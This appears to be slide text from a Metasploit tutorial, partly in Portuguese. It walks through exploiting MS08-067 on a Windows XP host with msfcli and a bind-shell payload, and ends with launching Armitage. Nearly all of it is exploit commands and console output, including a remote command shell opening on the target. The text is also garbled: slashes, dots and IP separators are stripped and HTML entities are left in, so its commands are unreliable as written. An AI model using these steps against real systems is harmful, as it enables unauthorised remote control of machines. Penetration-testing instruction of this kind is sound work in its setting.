Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage, run the command armitage. During startup, select Start MSF, which will allow armitage to connect to your Metasploit instance.
root@bt:/opt/framework3/msf3# armitage